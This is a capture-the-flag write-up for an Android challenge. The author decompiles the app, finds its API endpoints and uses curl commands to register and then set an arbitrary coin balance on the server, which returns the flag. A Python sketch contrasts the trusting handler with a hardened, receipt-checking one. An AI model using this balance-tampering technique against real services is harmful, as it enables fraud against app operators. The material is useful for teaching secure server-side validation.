After decompiling the given APK and reading some of the source code, it's
apparent that two of the Java code files get input (one for registration and one
for login), and each of those 3 side Java files also calls a native function
with the same name, each in a native library.

I opened each library using Cutter, decompiled the `stringFromJNI`
functions and got the strings they returned:  
```  
http://37.152.186.157/api/login  
http://37.152.186.157/api/register  
http://37.152.186.157/api/updateCoin  
```

The fields passed to these API endpoints are very apparent in the Java code files.

So... I registered and got a JWT token:  
```  
$ curl -X POST -d 'name=someone' -d '[email protected]' -d 'password=securitylaughes' http://37.152.186.157/api/register
{"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhdWQiOiIxIiwianRpIjoiNGJjMjQ4OTJhYTIzZWRjMzM1YTdjN2NkYmI4OTIwMjlhZjEyMTZjYzRkZDg1NWJhMjQxMDM4MjI4MDQzY2VmY2Y1NzMxMzBjMmIyYTQ2YzgiLCJpYXQiOjE2MDM5ODczNTMsIm5iZiI6MTYwMzk4NzM1MywiZXhwIjoxNjM1NTIzMzUzLCJzdWIiOiIxMjciLCJzY29wZXMiOltdfQ.emDVUrS_haOlprK53U0syul0JTwUWsYEXhH6v2cD1niMExLfPNKzDKYVWTH6ryhmdonVDb-n2R7sb6qpwhbQ33x6a7MrblJlUD2zmViCZ-2YCuzblwpn0waSIpGmihXRmZUboiFxdqQIoeR5h6vB2vNZC0caJ9X66BW6U8AKrNvfUZFFqJl-V_3YJ5xGnZ1IjWrS39q5t7YOHBd7MxUWBLO2P4mkrB9cqWP55Rf7mCyzZ0tawcQgmgoZdlD5Ukz5UppPHHT9JiCEffrj-qRe_r9DKD8pm09AAS8EjgfJBdlld-_IfPRklnaEFphMe3lKhZ-rTt83BKNPkCYEZB5EmMEKIe5eCJUZH2BUSOjB-y3Xj9SCVQcsQdJ5i5Nu_aPnJASllwbw_U3HXY-SW9KZHeV1s-MRIU7ccFywW_Fqve5KSnI3wngj4yoGk7M2MoPznwkEiqfI54eLLD3ZC-ryL0kG7MbwGsJTPMx6QmHyMMVF3IH2b8JvojPDpHFHopDWq-0N1Rgj82Y4AVOKwlLqAUJzqa7UGQ0ZTgJaTBjjNENPf9_5PpC7q4X0xHFDHBtYBJLHo1pDHFK5p-B7MvLgHnJ-ND4_iVu9R2KrTrlMKc-9JHbah9m0wI90hiUYuBeKM3L6PCeJwqrM6F_PBvJvwQB2iltdorUkKNpunWskRhQ","coinCount":null,"message":"Signed Up"}
```

I saved the JWT token in a bash variable `token` for ease of use in later API
calls.

Now, having a token and the updateCoin API endpoint, I tried to change the coin
amount as asked:  
```  
$ curl -X POST -H "Authorization: Bearer $token" -H 'Content-Type: application/json' -d "{\"token\": \"$token\", \"coinCount\": \"2000000000000000\"}" http://37.152.186.157/api/updateCoin
{"message":"The purchase was successful","coinCount":"2000000000000000","flag":"ZmRzdnNkRlNEcWUzQFFxZURXRUZEU1ZGU0RTNTVkc2Y1ZmV2c0RGcnEzNSRSI3J3ZnNlZnJ3IyQjJSNA"}
```

And we got the flag:
`RaziCTF{ZmRzdnNkRlNEcWUzQFFxZURXRUZEU1ZGU0RTNTVkc2Y1ZmV2c0RGcnEzNSRSI3J3ZnNlZnJ3IyQjJSNA}`

This challenge could also have been solved with either Frida or Wireshark (since
the traffic is HTTP and not secure)...
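
The updateCoin request above works because the server takes the new balance straight from the request body. As an added sketch (not the challenge's server code; `Account`, `COIN_PACKS`, `receiptId` and both handler names are hypothetical), here is that pattern next to a handler that derives the amount from server-side records:

```python
from dataclasses import dataclass, field

# Constructed catalogue: the only coin amounts the server will ever credit.
COIN_PACKS = {"small": 100, "large": 1000}


@dataclass
class Account:
    coins: int = 0
    redeemed: set = field(default_factory=set)


def update_coin_trusting(account, body):
    """Weak pattern: the balance becomes whatever the client sends."""
    account.coins = int(body["coinCount"])
    return account.coins


def update_coin_hardened(account, body, verified_receipts):
    """The client only names a receipt; the amount comes from server data.

    verified_receipts maps receipt id -> pack name and stands in for a
    lookup against the payment provider (an assumption of this sketch).
    """
    if "coinCount" in body:
        raise ValueError("client-supplied balance rejected")
    receipt_id = body.get("receiptId")
    pack = verified_receipts.get(receipt_id)
    if pack not in COIN_PACKS:
        raise ValueError("unknown or unverified receipt")
    if receipt_id in account.redeemed:
        # One credit per receipt, so replaying the request does nothing.
        raise ValueError("receipt already redeemed")
    account.redeemed.add(receipt_id)
    account.coins += COIN_PACKS[pack]
    return account.coins
```
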